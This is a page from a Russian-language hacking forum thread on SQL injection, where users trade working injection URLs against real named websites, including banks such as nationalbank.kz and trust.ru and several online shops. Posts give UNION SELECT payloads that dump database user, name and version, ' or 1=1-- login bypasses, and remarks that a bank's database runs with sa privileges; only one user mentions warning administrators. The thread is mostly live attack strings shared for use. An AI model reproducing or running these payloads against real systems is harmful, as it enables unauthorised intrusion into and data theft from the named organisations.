SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 6 of 798
  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Нам cfm не преграда :)
    canpharm.com
     
    #101 guest3297, 31 Oct 2006
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Zloy.org
    http://zloy.org/news_n93'4.html
    Уже месяц не могу закрыть...
     
    #102 guest3297, 31 Oct 2006
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    BlueShop.ru
    forum.vbios.com
     
    #103 guest3297, 31 Oct 2006
  4. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    И моя Гордость :)

     
    #104 guest3297, 31 Oct 2006
    1 person likes this.
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Инет Магаз
    Еще

     
    #105 guest3297, 31 Oct 2006
    Last edited: 31 Oct 2006
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    http://abris.info/price/mark1.asp?id=1 or 1=@@version--
    http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--

    табличка login там :)
     
    #106 guest3297, 31 Oct 2006
  7. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    ты уже 3 раз постиш это.


    23.10.2006, 01:48
     
    #107 _-[A.M.D]HiM@S-_, 31 Oct 2006
    Last edited: 31 Oct 2006
  8. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    _http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим

    _http://www.srochno.mk.ru/article.asp?id=8324'

    Пройдемся по банкам %)

    _http://www.rs.ru/ru/index.php?id70=320'

    _http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'

    _http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZGl2aWR1YWwvc2F2aW5ncy8=

    _http://www.nbt.tj/?c=44&id=4'4&a=263'

    _http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'

    _http://www.sdm-bank.ru/news/20044'

    _http://www.mtbank.ru/index.php?action='

    _http://www.roscredit.ru/main/newsroom/news/38'

    _http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit )

    _    http://www.paritate.ru/othernews/610301600'
     
    #108 gemaglabin, 31 Oct 2006
    2 people like this.
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи.

    Подставляя одинарную кавычку далеко не уйдешь имхо.
     
    #109 guest3297, 1 Nov 2006
    1 person likes this.
  10. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    shop.liprom.ru
    apace+win+mssql :) жесть...

    http://shop.liprom.ru/index.php
    post
    login ' or 1=1--
    pass ' or 1=1--

    далле
    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=@@version--

    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select+system_user)--

    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select%20db_name())--

    Далее

    http://shop.liprom.ru/test/
    post
    login ' or 1=1--
    pass ' or 1=1--

    Ну и инклуд думаю все заметят...
     
    #110 guest3297, 1 Nov 2006
    1 person likes this.
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Еще 1 шоп...
    http://megagym.ru/show_cat2.php?grid=999+union+select+concat(user(),char(58),database(),char(58),version())/*
     
    #111 guest3297, 1 Nov 2006
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    nationalbank.kz под sa запущен :)
    http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178+or+1=(select+system_user)--
     
    #112 guest3297, 1 Nov 2006
    1 person likes this.
  13. Robin_Hood

    Robin_Hood Elder - Старейшина

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    http://www.oneills.ie/shop/index.asp?catID=-999+union+select+null--
     
    #113 Robin_Hood, 2 Nov 2006
  14. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    В Microsoft JET Database Engine чисто по техническим причинам нельзя выполнить иньекцию в запрос...
     
    #114 guest3297, 2 Nov 2006
  15. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://section3.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1
    Code:
    http://www.hallmarkstudentministry.com/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&pg=1
     
    #115 Goudini, 4 Nov 2006
  16. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,2,user(),4,5,6,7,8,9/*
     
    #116 }{0TT@БЬ)Ч, 5 Nov 2006
  17. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://www.teplo-tech.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*&open=1
    Code:
    http://www.belvar.com/new/ru/production.html?id=-1+union+select+user()/*
    Code:
    http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+1+from+admin/*
     
    #117 Goudini, 5 Nov 2006
  18. BlackDog

    BlackDog Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    53
    Likes Received:
    19
    Reputations:
    -8
    http://www.raggame.ru/characters.asp?p_ind=27'

    админов предупредил - не латают.
     
    #118 BlackDog, 5 Nov 2006
  19. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    http://sax777.com/?act=-2%20union%20select%201,2,concat(version(),char(32),user(),char(32),database()),4,5,6,7,8/*
    Нашел, когда увидел вот этот http://hacker.sax777.com/ "хацкерский" квест.
     
    #119 podkashey, 6 Nov 2006
    1 person likes this.
  20. Reject

    Reject Member

    Joined:
    19 Oct 2006
    Messages:
    35
    Likes Received:
    8
    Reputations:
    17
    http://polar-bags.ru/view.php?catalog=1&mode=shop&id=999'+union+select+null/*
     
    #120 Reject, 6 Nov 2006
    1 person likes this.
(You must log in or sign up to post here.)
Page 6 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.